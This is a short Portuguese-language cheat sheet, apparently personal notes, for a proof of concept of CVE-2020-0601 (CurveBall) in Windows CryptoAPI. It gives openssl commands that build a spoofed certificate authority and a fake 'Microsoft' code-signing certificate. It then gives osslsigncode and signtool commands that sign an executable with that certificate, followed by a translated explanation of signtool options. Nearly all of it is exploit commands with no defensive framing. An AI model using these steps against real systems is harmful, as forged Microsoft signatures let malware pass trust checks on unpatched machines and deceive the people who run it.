
PoC para CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall
PoC para CVE-2020-0601 - Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall
No kali:
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
openssl ecparam -name secp384r1 -genkey -noout -out Microsoft.key
openssl req -new -key Microsoft.key -out Microsoft.csr -config openssl_cs.conf -reqexts v3_cs
openssl x509 -req -in Microsoft.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out Microsoft.crt -days 50000 -extfile openssl_cs.conf -extensions v3_cs
openssl pkcs12 -export -in Microsoft.crt -inkey Microsoft.key -certfile spoofed_ca.crt -name "Code Signing" -out Microsoft.p12
2. Assine o arquivo:
osslsigncode sign -pkcs12 Microsoft.p12 -n "Signed by DiDi" -pass 123 -in c1.exe -out c1_Microsoft_signed.exe

signtool sign /v /f Microsoft.p12 /tr http://timestamp.digicert.com /as /fd sha256 /p 123 c1.exe

Opções globais da linha de comando do signtool.exe: /v Exibe saída detalhada e mensagens de aviso, independentemente de o comando ter sido executado com sucesso. Opções do comando sign: /f Especifica o certificado de assinatura contido no arquivo. Se o arquivo estiver no formato Personal Information Exchange (PFX) e for protegido por senha, use a opção /p para especificar a senha. Se o arquivo não contiver a chave privada, use as opções /csp e /kc para especificar o CSP e o nome do contêiner da chave privada. /tr Especifica a URL do servidor de carimbo de data/hora RFC 3161. Se essa opção (ou /t) não estiver presente, nenhuma operação de carimbo de data/hora será executada no arquivo assinado. Se a operação de carimbo de data/hora falhar, um aviso será gerado. Esta opção não pode ser usada junto com a opção /t. /as Acrescenta esta assinatura. Se não houver uma assinatura primária, esta se tornará a assinatura primária. /fd Especifica o algoritmo de hash do arquivo a ser usado para criar a assinatura do arquivo. O valor padrão é SHA1. /p Especifica a senha a ser usada ao abrir o arquivo PFX. (Use a opção /f para especificar o arquivo PFX.)